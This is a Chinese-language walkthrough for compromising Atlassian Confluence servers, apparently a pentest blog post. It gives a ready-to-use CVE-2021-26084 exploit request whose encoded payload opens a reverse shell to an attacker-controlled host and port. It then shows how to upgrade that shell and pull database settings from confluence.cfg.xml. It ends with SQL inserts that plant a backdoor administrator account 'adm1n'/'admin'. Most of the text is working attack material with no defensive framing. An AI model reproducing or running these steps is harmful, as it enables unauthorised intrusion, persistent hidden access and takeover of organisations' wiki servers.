获取权限

CVE拿到服务器权限。

CVE-2021-26084 Confluence远程代码执行漏洞

1
2
3
4
5
6
7
8
9
POST /pages/doenterpagevariables.action HTTP/1.1
Host: host
User-Agent: curl/8.9.1
Accept: */*
Content-Length: 1328
Content-Type: application/x-www-form-urlencoded
Connection: close

queryString=%5Cu0027%2B%7BClass%2EforName%28%5Cu0027javax%2Escript%2EScriptEngineManager%5Cu0027%29%2EnewInstance%28%29%2EgetEngineByName%28%5Cu0027JavaScript%5Cu0027%29%2E%5Cu0065val%28%5Cu0027var%20isWin%20%3D%20java%2Elang%2ESystem%2EgetProperty%28%5Cu0022os%2Ename%5Cu0022%29%2EtoLowerCase%28%29%2Econtains%28%5Cu0022win%5Cu0022%29%3B%20var%20cmd%20%3D%20new%20java%2Elang%2EString%28%5Cu0022bash%20%5Cu002Di%20%5Cu003E%5Cu0026%20%2Fdev%2Ftcp%2F192%2E168%2E1%2E1%2F8085%200%5Cu003E%5Cu00261%5Cu0022%29%3Bvar%20p%20%3D%20new%20java%2Elang%2EProcessBuilder%28%29%3B%20if%28isWin%29%7Bp%2Ecommand%28%5Cu0022cmd%2Eexe%5Cu0022%2C%20%5Cu0022%2Fc%5Cu0022%2C%20cmd%29%3B%20%7D%20else%7Bp%2Ecommand%28%5Cu0022bash%5Cu0022%2C%20%5Cu0022%2Dc%5Cu0022%2C%20cmd%29%3B%20%7Dp%2EredirectErrorStream%28true%29%3B%20var%20process%3D%20p%2Estart%28%29%3B%20var%20inputStreamReader%20%3D%20new%20java%2Eio%2EInputStreamReader%28process%2EgetInputStream%28%29%29%3B%20var%20bufferedReader%20%3D%20new%20java%2Eio%2EBufferedReader%28inputStreamReader%29%3B%20var%20line%20%3D%20%5Cu0022%5Cu0022%3B%20var%20output%20%3D%20%5Cu0022%5Cu0022%3B%20while%28%28line%20%3D%20bufferedReader%2EreadLine%28%29%29%20%21%3D%20null%29%7Boutput%20%3D%20output%20%2B%20line%20%2B%20java%2Elang%2ECharacter%2EtoString%2810%29%3B%20%7D%5Cu0027%29%7D%2B%5Cu0027

修改host为目标,内容url解码以后修改为自己vps的ip和port。
升级哑shell编程交互式shell:
打开vps,输入exec bash
输入

1
python -c 'import pty; pty.spawn("/bin/bash")'

按下 ctrl-z
VPS终端中输入

1
2
stty raw -echo # 关闭输入显示
fg # 会没有显示

最后在获取到的目标机的shell输入

1
export SHELL=bash && export TERM=xterm-256color && stty rows 31 columns 134 && reset

即可获取完整的交互式shell。

获取数据库权限

默认路径为:/var/atlassian/application-data/confluence/confluence.cfg.xml
若无则用 find / -name “confluence.cfg.xml”
image.png
或者采用

1
cat /opt/atlassian/confluence/confluence/WEB-INF/classes/confluence-init.properties | grep confluence.home`

获取Confluence权限

1
select u.id, u.user_name, u.active from cwd_user u join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';

插入数据库管理员账号和密码 (用户名adm1n,密码admin),关注id是否重复。

1
insert into cwd_user(id, user_name, lower_user_name, active, created_date, updated_date, first_name, lower_first_name, last_name, lower_last_name, display_name, lower_display_name, email_address, lower_email_address, directory_id, credential) values (1212121, 'adm1n', 'adm1n', 'T', '2009-11-26 17:42:08', '2009-11-26 17:42:08', 'A. D.', 'a. d.', 'Ministrator', 'ministrator', 'A. D. Ministrator', 'a. d. ministrator', 'admin@example.com', 'admin@example.com', (select id from cwd_directory where directory_name='Confluence Internal Directory'), 'x61Ey612Kl2gpFL56FT9weDnpSo4AV8j8+qx2AuTHdRyY036xxzTTrw10Wq3+4qQyB+XURPWx1ONxp3Y3pB37A==');
1
insert into user_mapping values ('2c9681954172cf560000000000000001', 'adm1n', 'adm1n');

若是不存在confluence-administrators和confluence-users组,这还需要插入组。

1
2
3
4
5
6
7
8
-- 插入confluence-administrators
insert into cwd_group(id, group_name, lower_group_name, active, local, created_date, updated_date, description, group_type, directory_id)  
values ( '888888','confluence-administrators','confluence-administrators','T','F','2011-03-21 12:20:29','2011-03-21 12:20:29',NULL,'GROUP',(select id from cwd_directory where directory_name='Confluence Internal Directory'));

-- 插入confluence-users
insert into cwd_group(id, group_name, lower_group_name, active, local, created_date, updated_date, description, group_type, directory_id)  
values ( '999999','confluence-users','confluence-users','T','F','2011-03-21 12:20:29','2011-03-21 12:20:29',NULL,'GROUP',(select id from cwd_directory where directory_name='Confluence Internal Directory'));

最后新增adm1n到管理组(与前面组id要一致)。

1
2
3
4
-- 1
insert into cwd_membership (id, parent_id, child_user_id) values (888888, (select id from cwd_group where group_name='confluence-users' and directory_id=(select id from cwd_directory where directory_name='Confluence Internal Directory')), 1212121);  
-- 2
insert into cwd_membership (id, parent_id, child_user_id) values (999999, (select id from cwd_group where group_name='confluence-administrators' and directory_id=(select id from cwd_directory where directory_name='Confluence Internal Directory')), 1212121);

最后使用adm1n/admin登录进入系统。